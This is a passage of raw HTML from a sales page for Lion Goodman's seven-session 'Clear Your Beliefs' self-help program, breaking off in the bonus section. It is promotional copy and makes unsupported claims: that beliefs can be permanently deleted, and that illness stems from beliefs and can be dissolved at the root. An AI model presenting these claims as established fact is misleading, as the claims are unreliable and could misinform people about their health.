src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all 